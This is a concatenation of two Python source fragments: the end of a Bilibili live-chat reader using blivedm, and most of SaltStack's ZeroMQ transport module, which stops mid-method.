return data['data']['live_status'] == 1
def run(self, url):
roomid = self.get_room_id(url)
self._loop = asyncio.get_event_loop()
session = blivedm.BLiveClient(roomid, loop=self._loop)
session._on_receive_danmaku = lambda command: self._on_receive_danmaku(session, command)
session._on_super_chat = lambda command: self._on_super_chat(session, command)
session._on_receive_popularity = lambda command: self._on_receive_popularity(session, command)
future = session.start()
t = Thread(target = self.run_future, args= (future,))
t.setDaemon(True)
t.start()
return self.__chats
def run_future(self, future):
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
async def _on_receive_danmaku(self, bLiveClient, danmaku: blivedm.DanmakuMessage):
chat = Chat(
uid = danmaku.uid,
username = danmaku.uname,
timestamp = danmaku.timestamp / 1000,
message = danmaku.msg
)
self.__chats.put(chat)
async def _on_super_chat(self, bLiveClient, message: blivedm.SuperChatMessage):
chat = Chat(
uid = SuperChatMessage.uid,
username = SuperChatMessage.uname,
timestamp = SuperChatMessage.start_time / 1000,
message = SuperChatMessage.message
)
self.__chats.put(chat)
async def _on_receive_popularity(self, bLiveClient, popularity: int):
if popularity == 1 and not self.isLive():
self.__chats.close()
bLiveClient.close()
|
zeromq.py
|
# -*- coding: utf-8 -*-
"""
Zeromq transport classes
"""
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import errno
import hashlib
import logging
import os
import signal
import socket
import sys
import threading
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.payload
import salt.transport.client
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.versions
import salt.utils.zeromq
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
from salt._compat import ipaddress
from salt.exceptions import SaltException, SaltReqTimeoutError
from salt.ext import six
from salt.utils.zeromq import (
LIBZMQ_VERSION_INFO,
ZMQ_VERSION_INFO,
ZMQDefaultLoop,
install_zmq,
zmq,
)
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None):
"""
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
"""
from salt.utils.zeromq import ip_bracket
master_uri = "tcp://{master_ip}:{master_port}".format(
master_ip=ip_bracket(master_ip), master_port=master_port
)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = "tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_ip and not source_port:
master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_port and not source_ip:
ip_any = (
"0.0.0.0"
if ipaddress.ip_address(master_ip).version == 4
else ip_bracket("::")
)
master_uri = "tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format(
ip_any=ip_any,
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
else:
log.warning(
"Unable to connect to the Master using a specific source IP / port"
)
log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6")
log.warning(
"Specific source IP / port for connecting to master returner port: configuraion ignored"
)
return master_uri
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop")
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncZeroMQReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace(
"Inserted key into loop_instance_map id %s for key %s and process %s",
id(loop_instance_map),
key,
os.getpid(),
)
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncZeroMQReqChannel for %s", key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
# pylint: disable=too-many-function-args
result = cls.__new__(cls, copy.deepcopy(self.opts, memo))
# pylint: enable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ("_io_loop", "_refcount", "_refcount_lock"):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == "message_client":
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(
result,
key,
AsyncReqMessageClientPool(
result.opts,
args=(result.opts, self.master_uri,),
kwargs={"io_loop": self._io_loop},
),
)
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
kwargs.get("master_uri", opts.get("master_uri")), # master ID
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = "zeromq"
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self._io_loop = kwargs.get("io_loop")
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != "clear":
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug(
"Connecting the Minion to the Master URI (for the return server): %s",
self.master_uri,
)
self.message_client = AsyncReqMessageClientPool(
self.opts,
args=(self.opts, self.master_uri,),
kwargs={"io_loop": self._io_loop},
)
self._closing = False
def close(self):
"""
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
"""
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
if hasattr(self, "message_client"):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if "master_uri" in self.opts:
return self.opts["master_uri"]
# if by chance master_uri is not there..
if "master_ip" in self.opts:
return _get_master_uri(
self.opts["master_ip"],
self.opts["master_port"],
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_ret_port"),
)
# if we've reached here something is very abnormal
raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts")
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if "key" not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
"""
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
"""
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
"""
ret = yield self.message_client.send(
self._package_load(load), timeout=timeout, tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(
load, tries=tries, timeout=timeout, raw=raw
)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
"""
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
"""
def __init__(self, opts, **kwargs):
self.opts = opts
self.ttype = "zeromq"
self.io_loop = kwargs.get("io_loop")
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(
salt.utils.stringutils.to_bytes(self.opts["id"])
).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts["zmq_filtering"]:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast")
if self.opts.get("__role") == "syndic":
self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic")
else:
self._socket.setsockopt(
zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b"")
self._socket.setsockopt(
zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"])
)
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, "TCP_KEEPALIVE"):
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
recon_delay = self.opts["recon_default"]
if self.opts["recon_randomize"]:
recon_delay = randint(
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
)
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
recon_delay,
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts["recon_default"] + self.opts["recon_max"],
)
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"])
if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr(
zmq, "IPV4ONLY"
):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, "_monitor") and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, "_stream"):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, "_socket"):
self._socket.close(0)
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4506)) != 4506:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
log.debug(
"Connecting the Minion to the Master publish port, using the URI: %s",
self.master_pub,
)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
"""
Return the master publish port
"""
return _get_master_uri(
self.opts["master_ip"],
self.publish_port,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
"""
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
"""
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (
self.opts.get("__role") != "syndic"
and message_target not in ("broadcast", self.hexid)
) or (
self.opts.get("__role") == "syndic"
and message_target not in ("broadcast", "syndic")
):
log.debug("Publish received for not this minion: %s", message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(
(
"Invalid number of messages ({0}) in zeromq pub"
"message from master"
).format(len(messages_len))
)
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
"""
Return the current zmqstream, creating one if necessary
"""
if not hasattr(self, "_stream"):
self._stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
return self._stream
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
"""
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
"""
Multiprocessing target for the zmq queue device
"""
self.__setup_signals()
salt.utils.process.appendproctitle("MWorkerQueue")
self.context = zmq.Context(self.opts["worker_threads"])
# Prepare the zeromq sockets
self.uri = "tcp://{interface}:{ret_port}".format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Setting up the master communication server")
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
"""
Cleanly shutdown the router socket
"""
if self._closing:
return
log.info("MWorkerQueue under PID %s is closing", os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, "_monitor", None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, "_w_monitor", None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, "clients") and self.clients.closed is False:
self.clients.close()
if hasattr(self, "workers") and self.workers.closed is False:
self.workers.close()
if hasattr(self, "stream"):
self.stream.close()
if hasattr(self, "_socket") and self._socket.closed is False:
self._socket.close()
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
"""
Starts ZMQ monitor for debugging purposes.
:return:
"""
# Socket monitor shall be used the only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
log.debug("Starting ZMQ monitor")
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug("ZMQ monitor has been started started")
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
"""
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Worker binding to socket %s", self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
"""
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
"""
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == "AuthenticationError":
log.debug(
"Minion failed to auth to master. Since the payload is "
"encrypted, it is not known which minion failed to "
"authenticate. It is likely that this is a transient "
"failure due to the master rotating its public key."
)
else:
log.error("Bad load from minion: %s: %s", exc_type, exc)
stream.send(self.serial.dumps("bad load"))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict):
log.error(
"payload and load must be a dict. Payload was: %s and load was %s",
payload,
payload.get("load"),
)
stream.send(self.serial.dumps("payload and load must be a dict"))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if str("\0") in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {0} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth":
stream.send(self.serial.dumps(self._auth(payload["load"])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send("Some exception handling minion payload")
log.error("Some exception handling a payload from minion", exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.send(self.serial.dumps(ret))
elif req_fun == "send":
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == "send_private":
stream.send(
self.serial.dumps(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],)
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.send("Server-side exception handling payload")
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = "{0} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
"""
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
"""
if hasattr(zmq, "TCP_KEEPALIVE") and opts:
if "tcp_keepalive" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"])
if "tcp_keepalive_idle" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"])
if "tcp_keepalive_cnt" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"])
if "tcp_keepalive_intvl" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"])
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
"""
Encapsulate synchronous operations for a publisher channel
"""
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000))
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info("Starting the Salt Publisher on %s", pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug("Publish daemon getting data from puller %s", pull_uri)
package = pull_sock.recv()
log.debug("Publish daemon received payload. size=%d", len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(
unpacked_package
)
payload = unpacked_package["payload"]
log.trace("Accepted unpacked package from puller")
if self.opts["zmq_filtering"]:
# if you have a specific topic list, use that
if "topic_lst" in unpacked_package:
for topic in unpacked_package["topic_lst"]:
log.trace(
"Sending filtered data over publisher %s", pub_uri
)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(
hashlib.sha1(
salt.utils.stringutils.to_bytes(topic)
).hexdigest()
)
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent")
# Syndic broadcast
if self.opts.get("order_masters"):
log.trace("Sending filtered data to syndic")
pub_sock.send(b"syndic", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent to syndic")
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace(
"Sending broadcasted data over publisher %s", pub_uri
)
pub_sock.send(b"broadcast", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Broadcasted data has been sent")
else:
log.trace(
"Sending ZMQ-unfiltered data over publisher %s", pub_uri
)
pub_sock.send(payload)
log.trace("Unfiltered data has been sent")
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
log.trace("Publish daemon caught Keyboard interupt, tearing down")
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
"""
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
"""
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
"""
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
"""
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
log.debug("Connecting to pub server: %s", pull_uri)
